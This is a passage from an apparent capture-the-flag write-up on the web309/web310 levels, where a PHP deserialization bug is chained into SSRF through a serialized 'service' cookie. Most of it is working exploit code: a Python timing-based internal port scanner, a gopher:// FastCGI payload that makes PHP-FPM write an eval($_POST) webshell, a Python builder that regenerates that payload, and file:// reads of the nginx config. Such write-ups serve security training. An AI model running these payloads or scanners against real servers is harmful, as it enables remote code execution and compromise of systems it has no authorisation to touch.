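    dao::checkVersion() hands to checkUpdate() and so to curl. base64_encode(serialize($a))."""
    cfg = PhpObject("config", [("update_url", "public", update_url)])
    dao = PhpObject("dao", [("config", "private", cfg)])
    return base64.b64encode(php_serialize(dao).encode()).decode()


def scan_ports(index_url, ports, timeout=5.0):
    """Timing-based scan through the web309 SSRF. Needs network access to the target (the
    index_url argument is an assumption), so it is not exercised offline. A listening port
    accepts the gopher connection and waits for input, which stalls the server-side curl and
    hence our request until `timeout`; a closed port refuses at once and the page returns
    quickly. A firewall that silently drops packets also stalls, so verify any 'open' result."""
    results = {}
    for port in ports:
        cookie = build_service_cookie(f"gopher://127.0.0.1:{port}")
        req = urllib.request.Request(index_url, headers={"Cookie": f"service={cookie}"})
        started = time.monotonic()
        try:
            urllib.request.urlopen(req, timeout=timeout).read()
        except OSError:                  # URLError and socket timeouts both derive from OSError
            pass
        results[port] = "open" if time.monotonic() - started >= timeout else "closed"
    return results


if __name__ == "__main__":
    print(build_service_cookie("gopher://127.0.0.1:9000"))
```

build_service_cookie("gopher://127.0.0.1:9000") yields exactly the cookie value shown above; scan_ports("http://TARGET/index.php", [3306, 6379, 9000]) then runs the timing check against a live instance.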

Use gopher to drive FastCGI (PHP-FPM) on that port, again with Gopherus:

python2 gopherus.py --exploit fastcgi

Known absolute path of an existing PHP file:

/var/www/html/index.php

Command to execute:

echo "<?php eval(\$_POST[1]);?>" > 1.php

[screenshot omitted]

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH92%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%5C%04%00%3C%3Fphp%20system%28%27echo%20%22%3C%3Fphp%20eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22%20%3E%201.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
<?php
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}class config{public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH92%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%5C%04%00%3C%3Fphp%20system%28%27echo%20%22%3C%3Fphp%20eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22%20%3E%201.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}
$a = new dao();
echo base64_encode(serialize($a));
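As with the MySQL step, it is worth seeing what the FastCGI payload contains. The added Python example below (my code, not Gopherus's and not from the original page) rebuilds the same gopher:// URL from the FastCGI record format: a BEGIN_REQUEST, a PARAMS stream carrying the request variables, an empty PARAMS record that ends the stream, and the PHP body as STDIN. The trick is the PHP_VALUE parameter, which PHP-FPM honours per request: auto_prepend_file=php://input makes FPM execute the STDIN body before the requested script, and allow_url_include lets php://input be included at all. SCRIPT_FILENAME must be a real .php file on disk, which is why a known path is required. The SERVER_SOFTWARE value and the "Made-by-SpyD3r" marker are copied from the Gopherus output above so the result is byte-identical; neither matters to FPM.

```python
import struct
from urllib.parse import quote, unquote_to_bytes

FCGI_VERSION = 1
FCGI_BEGIN_REQUEST, FCGI_PARAMS, FCGI_STDIN = 1, 4, 5
FCGI_RESPONDER = 1


def fcgi_record(rtype, content, request_id=1):
    """One FastCGI record: 8-byte big-endian header, content, zero padding to an 8-byte boundary."""
    padding = (8 - len(content) % 8) % 8
    header = struct.pack(">BBHHBB", FCGI_VERSION, rtype, request_id, len(content), padding, 0)
    return header + content + b"\x00" * padding


def fcgi_pair(name, value):
    """FCGI_PARAMS name-value pair: lengths below 128 use one byte, otherwise 4 bytes with the high bit set."""
    def enc(n):
        return bytes([n]) if n < 128 else struct.pack(">I", n | 0x80000000)
    return enc(len(name)) + enc(len(value)) + name + value


def build_fastcgi_gopher(host, port, script_filename, command):
    """gopher:// URL feeding PHP-FPM a complete request. PHP_VALUE switches on
    auto_prepend_file=php://input so the STDIN body runs before script_filename,
    which must be an existing .php file (FPM checks the path and extension)."""
    body = f"<?php system('{command}');die('-----Made-by-SpyD3r-----\n');?>".encode()
    params = [
        (b"SERVER_SOFTWARE", b"go / fcgiclient "),          # cosmetic, copied from Gopherus
        (b"REMOTE_ADDR", b"127.0.0.1"),
        (b"SERVER_PROTOCOL", b"HTTP/1.1"),
        (b"CONTENT_LENGTH", str(len(body)).encode()),
        (b"REQUEST_METHOD", b"POST"),
        (b"PHP_VALUE", b"allow_url_include = On\ndisable_functions = \nauto_prepend_file = php://input"),
        (b"SCRIPT_FILENAME", script_filename.encode()),
        (b"DOCUMENT_ROOT", b"/"),
    ]
    raw = (
        fcgi_record(FCGI_BEGIN_REQUEST, struct.pack(">HB5x", FCGI_RESPONDER, 0))
        + fcgi_record(FCGI_PARAMS, b"".join(fcgi_pair(k, v) for k, v in params))
        + fcgi_record(FCGI_PARAMS, b"")          # empty record terminates the PARAMS stream
        + fcgi_record(FCGI_STDIN, body)
    )
    # Gopherus quotes like urllib.parse.quote with "/" kept unencoded; the "_" after the
    # slash is the gopher item-type byte that curl drops before writing the rest to the socket.
    return f"gopher://{host}:{port}/_" + quote(raw, safe="/")


def parse_fcgi_records(gopher_url):
    """Inverse for inspection: list of (type, content) records carried in the URL."""
    raw = unquote_to_bytes(gopher_url.split("/_", 1)[1])
    records, pos = [], 0
    while pos + 8 <= len(raw):
        _, rtype, _, length, padding, _ = struct.unpack(">BBHHBB", raw[pos:pos + 8])
        records.append((rtype, raw[pos + 8:pos + 8 + length]))
        pos += 8 + length + padding
    return records


if __name__ == "__main__":
    url = build_fastcgi_gopher("127.0.0.1", 9000, "/var/www/html/index.php",
                               r'echo "<?php eval(\$_POST[1]);?>" > 1.php')
    print(url)
    for rtype, content in parse_fcgi_records(url):
        print(rtype, len(content), content[:40])
```

The command string is placed inside PHP single quotes, so the \$ survives into the shell's double-quoted echo and becomes a literal $ in the written 1.php, exactly as in the Gopherus prompt above.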

web310

Same method as the previous level: gopher to FastCGI.
The flag is under /var/flag.

Alternatively, read the nginx configuration through the same SSRF with file://:

<?php
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
class config{
    public $update_url = 'file:///etc/nginx/nginx.conf';
}
$a = new dao();
echo base64_encode(serialize($a));

Output:

daemon off;
worker_processes  auto;
error_log  /var/log/nginx/error.log warn;
events {
    worker_connections  1024;
}
http {
    include       /etc/nginx/mime.types;
    default_type  application/octet-stream;
    sendfile        on;
    keepalive_timeout  65;
    server {
        listen       80;
        server_name  localhost;
        root         /var/www/html;
        index index.php;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        location / {
            try_files $uri  $uri/ /index.php?$args;
        }
        location ~ \.php$ {
            try_files $uri =404;
            fastcgi_pass   127.0.0.1:9000;
            fastcgi_index  index.php;
            include        fastcgi_params;
            fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
        }
    }
    server {
        listen       4476;
        server_name  localhost;
        root         /var/flag;
        index index.html;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }
}

A second server block listens on port 4476 with root /var/flag, so the flag can be fetched over plain HTTP through the SSRF. The server_name localhost line does not restrict this: it is the only server block on that port, so nginx uses it as the default for any Host header, and a request to 127.0.0.1 is served. The fastcgi_pass 127.0.0.1:9000 line also confirms the PHP-FPM port found by scanning.

<?php
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
class config{
    public $update_url = 'http://127.0.0.1:4476';
}
$a = new dao();
echo base64_encode(serialize($a));

Send it as the service cookie to /index.php as before.

http://www.jsqmd.com/news/1000972/
